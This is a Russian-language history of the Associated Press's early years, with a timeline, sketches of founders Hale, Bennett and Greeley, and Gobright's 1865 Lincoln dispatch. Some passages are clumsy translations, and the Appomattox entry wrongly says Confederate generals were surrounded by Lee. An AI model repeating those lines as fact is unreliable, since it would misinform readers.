Кооператив Ассошиэйтед Пресс был эффективен. Он быстро рос, от одного корреспондента в Галифаксе, Новой Шотландии, к корреспондентам в Соединенных Штатах в Бостоне, Филадельфии, Вашингтоне и позже к Среднему Западу. Используя телеграф и язык точек и тире, известный как азбука Морзе, АП росло, и в 1875 стало первой службой новостей, имеющей арендованный телеграфный провод. К концу столетия, АП стало сбалансированным, что позволило ему в следующие 50 лет стать самой большой организацией в мире, собирающей новости.
Даты
1848 Агентство Ассошиэйтед Пресс основано в Нью-Йорке десятью людьми, представляющими шесть изданий. Цель создания агентства – объединение усилий по сбору международных новостей и, как следствие, снижение затрат на телеграф. Информация по телеграфу передается не для всех газет по отдельности, а сразу Ассошиэйтед Пресс, а уже из агентства расходиться по газетам.
1849 Дэниел Краиг открывает первое заграничное бюро в Галифаксе, Новой Скотии, встречающее на шлюпках суда, прибывающие из Европы. Это позволяет АП передавать сообщения по телеграфу еще до того как корабль пристанет в Нью-Йорке.
1858 Свежие новости из Европы прибывают по трансатлантическому кабелю. Сообщения адресованные АП, включают 42 слова, суммирующие содержание 5 статей в виде заголовка, например: "Мятеж подавлен, вся Индия становится спокойной."
1861 Взвод репортеров агентства Ассошиэйтед Пресс послан освещать Американскую Гражданскую Войну, первый конфликт, освещенный многими газетами с разных сторон. Они сталкиваются с цензурой на их сообщения и документы под анонимной подписью: "корреспондент Ассошиэйтед Пресс."
1863 Корреспондент АП Джозеф Л. Гильберт передает слова Авраама Линкольна, когда президент посвящает кладбище в Геттисберге. Для историков, этот текст АП, известный как Геттисбергский Адрес, становится наиболее надежным свидетельством самых незабываемых трех минут истории.
1865 Генералы конфедерации окружены Робертом Е. Ли в Аппоматтоксе (Appomattox, Va). Корреспондент АП, путешествующий с Армией Потомакс видит Ли, появляющегося из дома, где он встретился с генералом Союза Улиссесом С. Грантом. (Ulisses S. Grant)
1875 Несмотря на возражения Западного Союза (Western Union), агентство Ассошиэйтед Пресс арендует свой первый телеграфный провод, 226-мильный кругооборот между Нью-Йорком, Филадельфией, Балтимором и Вашингтоном, что позволяет ему получать информацию гораздо более быстро.
1876 Марк Келлогг, стрингер, становится первым корреспондентом Ассошиэйтед пресс, погибшим во время исполнения служебных обязанностей, в городке Little Bighorn. Его последнее сообщение: "я иду с Кастером и умру."
Люди
Дэвид Хэйл (David Hale), издатель “Journal of Commerce”. Хэйл был назначен менеджером одной из 10 ежедневных газет Нью-Йорка в 1827 году. После того, как он увидел, насколько жестоко газеты борются между собой за свежие новости с континента, Хэйл нанес визит Джеймсу Гордону Беннетту, с предложением объединить силы, чтобы получать больше новостей. Беннетт согласился. В Мае 1848, Хейл собрал представителей 6 крупнейших Нью-йоркских газет, чтобы основать кооператив по сбору новостей. Кооператив был назван Ассошиэйтед Пресс
Джеймс Гордон Беннетт (James Gordon Bennett), публицист, издатель “New York Herald”. Он родился 1 сентября 1795 года в шотландском графстве Банфшир. Закончил католическую духовную семинарию в Эбердине, а в 1819 году переселился в Америку. После 16 лет неутомимой деятельности в качестве репортера и редактора в Галифаксе, Чарльстоне, Филадельфии и других местах, основал в 1835 году газету “New York Herald”. Мало-помалу газета стала одной из самых распространенных и богатых. Цена ее была рассчитана на людей, которые не могли себе позволить платить 6 пенни за другие газеты и журналы.
Беннетт первым в американской печати ввел биржевые сводки. Кроме того, он понимал огромную роль телеграфа. Так, первая большая парламентская речь, переданная по телеграфу – это была знаменитая речь Калгуна о мексиканской войне – на следующий же день была целиком напечатана в “New York Herald”. Секрет успеха газеты заключался в строгом следовании принципу сообщать как можно быстрее, не жалея никаких денег, все самое новое и самое интересное. В 1871 году Беннетт снарядил экспедицию для того чтобы найти пропавшего Ливингстона, который и был найден корреспондентом «Геральда» Стенли.
Как не велики заслуги Беннетта в области усовершенствования техники газетного дела, но для нравственного подъема печати он сделал очень мало. Его газета – это то, что мы сейчас называем желтой прессой и работал Беннетт не для объективного информирования аудитории, а ради собственной выгоды. До самой его смерти (1872, Нью-Йорк), его газета приносила ему ежегодный доход до 750 тысяч долларов.
В 1847 году к Беннетту обратился Дэвид Хейл, который предложил объединить усилия, чтобы иметь информацию о большем количестве событий, экономя при этом деньги. Годом позже, Беннетт стал основателем агентства Ассошиэйтед Пресс.
Хорас Грили (Horace Greeley), журналист и политический деятель, основатель “New York Tribune”. Годы жизни – 1811-1872. В молодости Грили был наборщиком, в 1834 году основал еженедельную газету “New Yorker”, а в 1841 году соединил ее с другой редактируемой им газетой “The Log Cabin” в новое издание “New York Tribune”. “Tribune” долгое время была могущественным орудием республиканской партии. В 1848 он присоединился к издателям пяти других Нью-йоркских газет, чтобы сформировать агентство Ассошиэйтед Пресс.
Сам Грили был влиятельным республиканцем и всячески содействовал избранию Линкольна в президенты. Позднее Грили из крайнего радикала превратился в приверженца демократической партии. В 1872 году он был выставлен кандидатом в президенты против Гранта, но безуспешно.
Лоренс А. Гобрайт (Lawrence A. Gobright), первый корреспондент АП в Вашингтоне. Гобрайт был известным журналистом, когда в 1848 году он вступил в Ассошиэйтед Пресс. Он стал руководителем Вашингтонского бюро в 1856 и занимал этот пост до 1879. Гобрайт освещал президентство Авраама Линкольна в течении всей гражданской войны. Когда Линкольн был застрелен в театре Форд, Гобрайт был там. В тот вечер он написал самое важное сообщение в своей карьере:
Washington, april 14, 1865
To the Associated Press:
The president was shot in a theatre tonight and perhaps mortally wounded.
Вашингтон, 14 апреля, 1865
Ассошиэйтед Пресс
В президента стреляли сегодня вечером в театре, и, возможно он ранен смертельно.
. |